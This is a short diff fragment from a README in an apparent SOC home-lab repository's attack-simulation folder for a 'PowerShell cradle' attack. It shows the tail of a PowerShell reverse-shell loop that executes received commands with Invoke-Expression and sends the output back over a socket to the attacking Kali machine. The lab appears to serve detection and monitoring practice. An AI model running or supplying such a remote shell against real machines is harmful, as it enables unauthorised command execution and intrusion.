NunooFerreira/SOC-HomeLab-Cyber-Monitoring/attack-simulations/Powershell Cradle Attack/README.md

     # Execute the command on the Windows machine and capture output
     $output = Invoke-Expression $command 2>&1

-    # Send the output back to the attacker
+    # Send the output back to the Kali
     $writer.WriteLine($output)
     $writer.Flush()
 }

-# Close the connection
 $client.Close()
 ```